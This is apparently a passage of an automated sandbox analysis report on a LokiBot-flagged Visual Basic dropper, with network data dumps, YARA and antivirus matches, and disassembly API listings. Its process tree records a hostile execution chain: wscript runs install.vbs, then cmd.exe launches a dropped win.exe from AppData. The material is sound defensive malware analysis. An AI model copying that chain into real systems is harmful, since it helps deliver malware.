c6 49 73 f0 e2 27 ef d4 31 c5 16 c8 a7 98 d5 17 b8 b4 ed bd 14 e8 35 8d 38 69 22 16 60 3b 10 3c c8 da 68 a2 91 7c 9a c4 86 c1 c5 02 b7 1c 3c 70 44 5b 6d 0b 3a 7a be a7 03 74 1e f0 b1 b4 80 28 38 e4 8d ef 5a bf b1 08 6f d1 88 82 f4 c3 aa f3 56 76 40 e8 d9 04 c5 f5 aa 54 d1 0e 58 45 fe 0a 36 78 b5 18 ee 22 d0 ee b1 da e0 95 9b 5c fc 17 8b e6 82 72 1c 37 66 6f 92 08 70 b3 c1 67 b9 e8 20 97 ae 83 f0 09 8c 5b f6 df 62 50 c3 4f 61 0b ee dc d6 ca fa e6 1f c3 d8 f4 57 2a ae d9 f5 dd 9d 65 36 57 2f 6f 4a 8e 03 3a d6 56 2d 4f a0 cc 1d 94 6d 24 fe 87 66 28 86 3e 25 2d 86 7f 2b be d5 41 a7 b9 34 f6 d0 cd bb 36 03 b5 c2 22 9c b1 91 63 68 Data Ascii: :Pza,\DL)2 5h;TTfj8Mk]YO<sD[m:zXtH(8ZoVv@TXE6x"?OS6\GO):$-+?wGh<s/oJ:2Q}n@M:v8!{ge7A%+(4F&Ff{E)~BDJ;R?LSj1EkOPD@,+7K@@&3_I983=G1;\|:F6Z5m#,+Xu ,K1;x$~C'fhod\jSSE\GM/5#2Xw:Gq}_t3^h5BE8YzHnJz{FA}AfZ7=oR7,'t^>I}-CjTR%^cvUDa{azx-)c`h%f+MWVhCFDP!jnOgZa'A9mcOEb}}c^s'+V(Lmt,<I/QL1@~]}/p"^:Pc-X,JKLwDEg~w :5kT^?5UX\|OmgIK040Pl6gtFIs'158i"`;<h\|<pD[m:zt(8ZoVv@TXE6x"\r7fopg [bPOaWe6W/oJ:V-Om$f(>%-+A46"ch
Feb 23, 2021 11:54:17.948980093 CET	5168	IN	Data Raw: 63 f3 4e cb 5a 09 8e 8f 1e df 36 51 dd b1 25 dd 89 86 75 e5 30 00 6e 46 4d dd 32 cf f2 36 24 c2 76 ca 38 ac 3b 3b 19 29 66 18 1b f0 09 8b 51 f8 5c cc f8 1a 5a 58 7e 63 1d c7 e7 5c 33 1b 02 61 96 de 4a ba 5e b2 59 45 c2 84 dd 42 44 9b cf f2 1a b2 Data Ascii: cNZ6Q%u0nFM26$v8;;)fQ\ZX~c\3aJ^YEBDD`LS0Dk`OPD+A,+7K@P"3_I983=G1;~:V6J5m#,mYm!,K(1!;x$~C'fhod;
Feb 23, 2021 11:54:17.948992968 CET	5169	IN	Data Raw: 21 88 c8 c7 fe 0b aa bf ed 6e 4f 67 5a 61 27 91 f7 41 39 88 6d 23 b3 9c e0 61 e9 da 99 76 26 d0 98 4e b9 fc 8e 62 6e 10 7d 7d d0 dc ba 63 72 5f e8 d5 f7 be e8 8e e4 1d 73 d4 fc a1 27 b8 b1 2b d1 56 86 9c b0 28 fb 96 4c f9 6d 02 74 e1 04 2c 9a 3c Data Ascii: !nOgZa'A9m#av&Nbn}}cr_s'+V(Lmt,<I/QL1@~]}/p"^:Pc-X,JKLwDEg~w :5kT^?5UX\|OmgIK040Pl6gtFIs'158i"`;<h\|
Feb 23, 2021 11:54:17.949004889 CET	5170	IN	Data Raw: 1a 5a 58 7e 63 1d c7 e7 5c 33 1b 02 61 96 de 4a ba 5e b2 59 45 c2 84 dd 42 44 9b cf f2 1a b2 05 d3 ab 18 83 00 cc 44 c6 60 4c ec 06 82 53 15 c0 c4 8a b2 14 0f bb 30 02 e2 af 81 44 6b dd 60 4f b9 b8 50 d7 44 bf 2b 41 2c 2b a0 37 c9 ac 98 18 b5 ac Data Ascii: ZX~c\3aJ^YEBDD`LS0Dk`OPD+A,+7K@P"3_I983=G1;~:V6J5m#,mYm!,K(1!;x$~C'fhod;\jSSE\GM/5#2Xw:G
Feb 23, 2021 11:54:17.949018002 CET	5172	IN	Data Raw: 3d 04 96 eb aa 7e ce 4e e0 27 b7 06 2e f7 e4 c7 9c bf 87 3a 1d 9c aa 62 ad 61 fd b6 6d 9a 6a 51 23 a3 2c 10 04 bc 5b 48 7c f6 4d 34 3c 76 95 cb dd bb c9 1b f9 f6 2a fe 47 70 22 5e 7a af c7 a5 3c 42 97 2c 9c ac fe 9f c0 d4 5a 12 4b 98 c5 32 ec cf Data Ascii: =~N'.:bamjQ#,[H\|M4<vGp"^z<B,ZK2szx)YepA=Y~\|Bm>!aq[s0[&obaK;0QbRmJ5zo7+I9Oe\jSivNNbm0X.}"N&w.
Feb 23, 2021 11:54:17.949033976 CET	5173	IN	Data Raw: 49 cd b3 30 57 69 43 7e 31 63 35 25 4f b9 b8 09 8a 86 bb 2b 14 a7 c7 2b 72 c1 29 58 65 b7 9f 3a 15 19 4f e4 fe 20 30 51 90 b9 7f 5c 57 b8 b3 b6 4c 0b fb 11 3f ed 0e 38 ec 96 36 c6 a9 47 a6 3a 48 b6 cc f9 21 2e 42 ec 7b ce b5 74 03 10 3b 1e 73 c6 Data Ascii: I0WiC~1c5%O++r)Xe:O 0Q\WL?86G:H!.B{t;silhui%miJ\gQ;!T#modX;6XS4+S/ZU/m#62XwR0oM=P53r,ba8B<;X0'AN
Feb 23, 2021 11:54:17.949049950 CET	5174	IN	Data Raw: a9 d2 f4 95 5f 7e 70 22 36 02 06 f3 ad ad a4 93 9f dd ac 16 be d4 2c 4a 7a 67 ce 0d 77 56 e7 b1 cd 26 95 96 a1 d7 98 20 a3 fe 25 c8 ac a0 1f bd 76 0f 27 0d d7 b9 74 a4 54 95 2d 16 80 a7 a7 69 73 3e 97 1b 0d 9c c2 ac 77 32 a7 cc ab 97 2d 06 61 79 Data Ascii: _~p"6,JzgwV& %v'tT-is>w2-ayb)#4t /Qn>suYzLI\|N{z=c[$KabcN_FC)!&2mG"r?zx>Z\\$
Feb 23, 2021 11:54:17.949065924 CET	5176	IN	Data Raw: c1 86 bf 0e 6b bf 99 3a 40 d8 cc d8 c9 6e e9 b8 24 12 6a 3f bf 50 31 17 c1 7e 64 c2 5d 67 8b fa 55 8c b5 06 5f 12 d4 d1 b8 25 50 b1 ee 0b be 9a d6 f9 5d ae 69 26 c1 53 92 4c b1 3e 60 2c 2a 06 20 c4 ce 34 21 a0 ea 3b f5 69 d6 bc b5 de 74 cc 66 e3 Data Ascii: k:@n$j?P1~d]gU_%P]i&SL>`,* 4!;itf"]z{o$[)~BhfF\|5S}>X"iSxGSxI9uw4-Ay?KRVCAQm~d\{RkS*
Feb 23, 2021 11:54:17.949081898 CET	5177	IN	Data Raw: 30 88 4a 35 f4 aa e8 f1 f7 80 a7 91 bf 27 af fe 5b 67 6f fb f4 7e da c1 0d 12 af 17 0a 91 6e 15 7c 63 b2 92 05 e7 3a 65 d9 ea 9c 7c 11 f7 4c 3c 71 08 73 0f f7 1f bc 95 31 7e 5e 7f e6 98 5e dc 50 fe 1a 42 eb 6b d9 9d 86 49 91 57 60 b0 ec b7 03 7f Data Ascii: 0J5'[go~n\|c:e\|L<qs1~^^PBkIW`43y>E?'}pD/~j3N{y2\CJn~aZ^&X"j:KVcB43\u3vQw'ky#~.JN)Cif:X
Feb 23, 2021 11:54:17.949105978 CET	5178	IN	Data Raw: dc 39 6e c5 42 6d da 71 61 a4 ec d4 08 a5 d1 ce ac 54 3b fb 6c 87 31 66 10 e1 96 a4 61 76 e5 2a 2b ef 7d e9 12 7e 68 77 fe 15 43 0b 2f 9b 1e 26 5b fa 14 50 71 0e 9c 1a d0 60 0d 00 fe 28 19 b8 51 c4 e1 11 a2 b7 fd e7 18 ef 05 ec 00 59 77 3a ca f1 Data Ascii: 9nBmqaT;l1fav*+}~hwC/&[Pq`(QYw:,?!~Mc'@?_PVjK;&u^]22/{-Ta^gM9w\Cnqw5X4R>7w6@++(l,Y+Ecz hK#c
Feb 23, 2021 11:54:18.194422007 CET	5180	IN	Data Raw: 48 a3 27 06 0a dc 3a e9 9d 2c 74 54 fb 30 b6 ed bd 47 be b8 08 40 94 dd e9 37 6b 9d 71 c0 25 7d 8e c2 3d 9a 94 79 d4 51 53 f6 1c bf 88 bb d2 28 f3 4f 58 3d 4b 13 f9 53 f8 3a 70 d1 78 d0 12 79 ef 5a e6 e8 62 3b 68 18 3a b5 c3 42 a6 bb 89 bf 01 2a Data Ascii: H':,tT0G@7kq%}=yQS(OX=KS:pxyZb;h:B*'.#4YBq/}L+mg5WPR/<Z1XRE&xE5WqTj)CM ^{>`^>2n?cn%.GR{<ty`{v2s

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SecuriteInfo.com.Variant.Razy.845229.27038.exe PID: 7064 Parent PID: 5940

General

Start time:	11:50:27
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe'
Imagebase:	0x400000
File size:	106496 bytes
MD5 hash:	869EAE0220A293DCABF4051DD323BBD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: SecuriteInfo.com.Variant.Razy.845229.27038.exe PID: 6440 Parent PID: 7064

General

Start time:	11:54:09
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe'
Imagebase:	0x400000
File size:	106496 bytes
MD5 hash:	869EAE0220A293DCABF4051DD323BBD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000013.00000003.820991756.000000000094C000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: wscript.exe PID: 6260 Parent PID: 6440

General

Start time:	11:54:19
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
Imagebase:	0x840000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4272 Parent PID: 6260

General

Start time:	11:54:22
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6156 Parent PID: 4272

General

Start time:	11:54:22
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: win.exe PID: 4720 Parent PID: 4272

General

Start time:	11:54:22
Start date:	23/02/2021
Path:	C:\Users\user\AppData\Roaming\win.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\win.exe
Imagebase:	0x400000
File size:	106496 bytes
MD5 hash:	869EAE0220A293DCABF4051DD323BBD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 35%, Virustotal, Browse Detection: 40%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: win.exe PID: 1636 Parent PID: 3440

General

Start time:	11:54:28
Start date:	23/02/2021
Path:	C:\Users\user\AppData\Roaming\win.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\win.exe'
Imagebase:	0x400000
File size:	106496 bytes
MD5 hash:	869EAE0220A293DCABF4051DD323BBD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: SecuriteInfo.com.Variant.Razy.845229.27038.exe PID: 7064 Parent PID: 5940 SecuriteInfo.com.Variant.Razy.845229.27038.exeCOMMON

Executed Functions

Function 00412470, Relevance: 118.0, APIs: 60, Strings: 7, Instructions: 780COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,004011E6), ref: 0041248E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,00000284), ref: 0041250A
__vbaNew2.MSVBVM60(00411E18,00416E2C), ref: 0041253C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411E08,00000014), ref: 004125A2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411E28,000000E0), ref: 00412605
__vbaStrMove.MSVBVM60 ref: 00412636
__vbaFreeObj.MSVBVM60 ref: 0041263F
__vbaNew2.MSVBVM60(004101A4,00415010), ref: 0041265F
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412699
__vbaChkstk.MSVBVM60 ref: 004126BE
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411E38,000001D0), ref: 00412726
__vbaFreeObj.MSVBVM60 ref: 00412741
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411C7C,000006F8), ref: 004127CB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411C7C,000006FC), ref: 0041281D
__vbaNew2.MSVBVM60(004101A4,00415010), ref: 0041284F
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412889
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411E48,00000138), ref: 004128DA
__vbaNew2.MSVBVM60(004101A4,00415010), ref: 00412905
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041293F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411E38,00000170), ref: 0041298D
__vbaVarDup.MSVBVM60 ref: 004129CE
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00412A90
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,004011E6), ref: 00412AA6
__vbaVarAdd.MSVBVM60(?,00000002,?), ref: 00412AD9
__vbaVarMove.MSVBVM60 ref: 00412AE4
__vbaNew2.MSVBVM60(004101A4,00415010), ref: 00412B04
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412B3E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411E38,00000060), ref: 00412B89
__vbaNew2.MSVBVM60(004101A4,00415010), ref: 00412BB4
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412BEE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411E38,00000050), ref: 00412C36
__vbaNew2.MSVBVM60(004101A4,00415010), ref: 00412C61
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412C9B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411E48,00000130), ref: 00412CE9
__vbaNew2.MSVBVM60(004101A4,00415010), ref: 00412D14
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412D4E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411E38,00000088), ref: 00412D9F
__vbaStrMove.MSVBVM60 ref: 00412E3B
__vbaChkstk.MSVBVM60(0A951920,0000493A,00000003,?,?), ref: 00412E79
__vbaChkstk.MSVBVM60(004B3E59,0A951920,0000493A,00000003,?,?), ref: 00412EAD
__vbaFreeStr.MSVBVM60 ref: 00412F05
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 00412F1D
__vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 00412F3A
__vbaNew2.MSVBVM60(004101A4,00415010), ref: 00412F5D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412F97
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411E38,000000F8), ref: 00412FE5
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00413009
__vbaI4Var.MSVBVM60(?,?), ref: 00413031
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00413066
__vbaFreeVar.MSVBVM60 ref: 00413072
__vbaVarTstLt.MSVBVM60(00008003,?), ref: 0041309E
__vbaOnError.MSVBVM60(000000FF), ref: 004130B9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,00000288), ref: 004130FF
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00413123
__vbaI4Var.MSVBVM60(00000000), ref: 0041312D
__vbaFreeObj.MSVBVM60 ref: 00413139
__vbaFreeVar.MSVBVM60 ref: 00413142
__vbaFreeStr.MSVBVM60 ref: 00413175
__vbaFreeStr.MSVBVM60(004131ED), ref: 004131DD
__vbaFreeVar.MSVBVM60 ref: 004131E6

Strings

54, xrefs: 00412DB7
COGNITIONS, xrefs: 00412ED8
alkoxy, xrefs: 00412A2C
:I, xrefs: 00412DCB
,nA, xrefs: 0041254E
Nerveroot, xrefs: 004129AE
foldevg, xrefs: 00412DE8

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$New2$List$Chkstk$Move$CallLate$Error
String ID: ,nA$54$:I$COGNITIONS$Nerveroot$alkoxy$foldevg
API String ID: 2141833910-582225477
Opcode ID: ddaaf1c2c807b2aba55d4a7a192ab49509025ecbd6a2f3667292f3ed3b2858d4
Instruction ID: 69be29057da00622914bfcc39c07d3c71d408016b27f3fe2e7548168072a0899
Opcode Fuzzy Hash: ddaaf1c2c807b2aba55d4a7a192ab49509025ecbd6a2f3667292f3ed3b2858d4
Instruction Fuzzy Hash: FD820874940219DFDB24DF90CD88BDEBBB5BB48300F1085EAE54AAB250DBB45AC4DF94

Uniqueness

Uniqueness Score: -1.00%

Function 00413910, Relevance: 103.7, APIs: 50, Strings: 9, Instructions: 434COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0041397D
__vbaNew2.MSVBVM60(004101A4,00415010), ref: 00413996
__vbaObjSet.MSVBVM60(?,00000000), ref: 004139AF
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411E38,00000050), ref: 004139D0
#645.MSVBVM60(?,00000000), ref: 004139EC
__vbaStrMove.MSVBVM60 ref: 004139F7
__vbaFreeObj.MSVBVM60 ref: 00413A06
__vbaFreeVar.MSVBVM60 ref: 00413A0B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,00000218), ref: 00413A45
__vbaLateMemCallLd.MSVBVM60(?,?,Add,00000002), ref: 00413A98
__vbaObjVar.MSVBVM60(00000000), ref: 00413A9E
__vbaObjSetAddref.MSVBVM60(?,00000000), ref: 00413AA9
__vbaFreeObj.MSVBVM60 ref: 00413AB2
__vbaFreeVar.MSVBVM60 ref: 00413AB7
__vbaLateMemSt.MSVBVM60(?,Caption), ref: 00413AF2
__vbaLateMemSt.MSVBVM60(?,Left), ref: 00413B23
__vbaNew2.MSVBVM60(004101A4,00415010), ref: 00413B38
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413B51
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411E38,000000A0), ref: 00413B85
__vbaLateMemSt.MSVBVM60(?,Top), ref: 00413BC0
__vbaFreeObj.MSVBVM60 ref: 00413BC5
__vbaLateMemSt.MSVBVM60(?,Visible), ref: 00413BF4
__vbaLateMemCallLd.MSVBVM60(?,?,Caption,00000000), ref: 00413C13
__vbaVarTstEq.MSVBVM60(00008008,00000000), ref: 00413C1D
__vbaFreeVar.MSVBVM60 ref: 00413C29
__vbaNew2.MSVBVM60(004101A4,00415010), ref: 00413C47
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413C66
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411E38,00000108), ref: 00413C89
#580.MSVBVM60(?,00000001), ref: 00413C95
__vbaFreeStr.MSVBVM60 ref: 00413C9E
__vbaFreeObj.MSVBVM60 ref: 00413CA7
__vbaVarDup.MSVBVM60 ref: 00413CC5
#528.MSVBVM60(?,?), ref: 00413CD3
__vbaVarTstNe.MSVBVM60(?,?), ref: 00413CF5
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00413D08
__vbaNew2.MSVBVM60(004101A4,00415010), ref: 00413D2D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413D46
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411E48,00000138), ref: 00413D72
__vbaNew2.MSVBVM60(004101A4,00415010), ref: 00413D8F
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413DA8
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411E38,00000178), ref: 00413DCB
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00413DD9
__vbaFpI4.MSVBVM60 ref: 00413DED
__vbaI4Var.MSVBVM60(?,00000000), ref: 00413DF8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,000002C8), ref: 00413E4F
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00413E5F
__vbaFreeVar.MSVBVM60 ref: 00413E6B
__vbaFreeStr.MSVBVM60(00413EC8), ref: 00413EB7
__vbaFreeObj.MSVBVM60 ref: 00413EBC
__vbaFreeStr.MSVBVM60 ref: 00413EC5

Strings

JENHJDERNE, xrefs: 00413A25
Bigwiggedness1, xrefs: 00413ADB
Add, xrefs: 00413A8E
Caption, xrefs: 00413AE9, 00413BFB
VB.CheckBox, xrefs: 00413A1B
laboratorieplanlgning, xrefs: 00413C05
Top, xrefs: 00413BB7
Left, xrefs: 00413B1A
Visible, xrefs: 00413BEB

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultLate$New2$Call$List$#528#580#645AddrefCopyMove
String ID: Add$Bigwiggedness1$Caption$JENHJDERNE$Left$Top$VB.CheckBox$Visible$laboratorieplanlgning
API String ID: 2919225322-1384937702
Opcode ID: 70af696f0cdde28df5590981886ddffad5bf6f54904db0491b6e15414a1cf86c
Instruction ID: b94af3517ea7b1b39c6177971a2717a2c3c7a775a684b7650fd7a78bb3f50529
Opcode Fuzzy Hash: 70af696f0cdde28df5590981886ddffad5bf6f54904db0491b6e15414a1cf86c
Instruction Fuzzy Hash: 96025E71E002099FCB14DFA8DD88ADEBBB8FF48700F10856AE549E7251D734A985CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004136D0, Relevance: 43.9, APIs: 23, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

#541.MSVBVM60(?,2:2:2), ref: 00413734
__vbaStrVarMove.MSVBVM60(?), ref: 0041373E
__vbaStrMove.MSVBVM60 ref: 00413749
__vbaFreeVar.MSVBVM60 ref: 00413758
__vbaI4Str.MSVBVM60(00411EF8), ref: 0041375F
#698.MSVBVM60(?,00000000), ref: 0041376A
__vbaVarTstNe.MSVBVM60(?,?), ref: 00413786
__vbaFreeVar.MSVBVM60 ref: 00413792
__vbaNew2.MSVBVM60(00411E18,00416E2C), ref: 004137AB
__vbaHresultCheckObj.MSVBVM60(00000000,0211ECFC,00411E08,00000048), ref: 004137D2
__vbaStrMove.MSVBVM60 ref: 004137E1
__vbaVarDup.MSVBVM60 ref: 004137FC
#545.MSVBVM60(?,?), ref: 0041380A
__vbaVarTstNe.MSVBVM60(?,?), ref: 00413828
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041383B
__vbaNew2.MSVBVM60(00411E18,00416E2C), ref: 0041385B
__vbaObjVar.MSVBVM60(?), ref: 0041386D
__vbaObjSetAddref.MSVBVM60(?,00000000), ref: 00413878
__vbaHresultCheckObj.MSVBVM60(00000000,0211ECFC,00411E08,00000010), ref: 00413892
__vbaFreeObj.MSVBVM60 ref: 0041389B
__vbaFreeVar.MSVBVM60(004138EC), ref: 004138D5
__vbaFreeStr.MSVBVM60 ref: 004138E4
__vbaFreeStr.MSVBVM60 ref: 004138E9

Strings

8/8/8, xrefs: 004137F2
2:2:2, xrefs: 0041370A

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresultNew2$#541#545#698AddrefList
String ID: 2:2:2$8/8/8
API String ID: 889502001-2856156558
Opcode ID: 94102fbe9255d969295adb6d1d90dd2c4d16462f2d2b37912ccca9078bff76fe
Instruction ID: 8c57018c9f96abe09a3eddd8e7fd9da4480fdd149e1ecacdb0cd46278325f43f
Opcode Fuzzy Hash: 94102fbe9255d969295adb6d1d90dd2c4d16462f2d2b37912ccca9078bff76fe
Instruction Fuzzy Hash: 90513D75D00259ABCB10DFE4DA489DDBBB8FB48B01F20812AF541B7164D7746A85CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401378, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 319COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 0040137D

Strings

VB5!6&*, xrefs: 00401378

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 3081e8d9029d04fd8432cb2a3ed51792ef055dcc3a259369ce4aef0c4780f277
Instruction ID: b3c3dbf06f48525132a5b958df2522bb05243b37e77d22eb6b31bb819ea01f91
Opcode Fuzzy Hash: 3081e8d9029d04fd8432cb2a3ed51792ef055dcc3a259369ce4aef0c4780f277
Instruction Fuzzy Hash: 2851E9A244E7D14FD3138778582AA827F749E53228B0E06EBD4D1CF4F3D11A590AC366

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404DA2, Relevance: 7.4, Strings: 5, Instructions: 1105COMMON

Download Yara Rule

Strings

====, xrefs: 00404DA6
====, xrefs: 00404DBA
====, xrefs: 00404DB5
====, xrefs: 00404DB0
====, xrefs: 00404DAB

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ====$====$====$====$====
API String ID: 0-3413894826
Opcode ID: 78f785be3ffd8fd1d0965754c21e3e436afdea7286e430acdc190fe940fa8b05
Instruction ID: 480e37e28afe0fe0509975174c49b96b506ffc6df2bca69c77e661ac0272db40
Opcode Fuzzy Hash: 78f785be3ffd8fd1d0965754c21e3e436afdea7286e430acdc190fe940fa8b05
Instruction Fuzzy Hash: 58524742E2E701D4F6932021C2507665551DF63382E32CB7B9C2BB19E53B3F4A8B29CE

Uniqueness

Uniqueness Score: -1.00%

Function 004043B6, Relevance: 1.6, Instructions: 1612COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c6bcb38d7caad14bd811b0f5a4191a4a87563f5b763a4174390194caef18902
Instruction ID: 5a1cc791577fb2b521f28dfe6a2b298f89e7c868b731c801a4f780ef50a02cce
Opcode Fuzzy Hash: 5c6bcb38d7caad14bd811b0f5a4191a4a87563f5b763a4174390194caef18902
Instruction Fuzzy Hash: 76928C83E6EB0199F6533861C1407756691DF63382E328B778D1A715E2373F4A4F2A8E

Uniqueness

Uniqueness Score: -1.00%

Function 004049E3, Relevance: 1.2, Instructions: 1244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
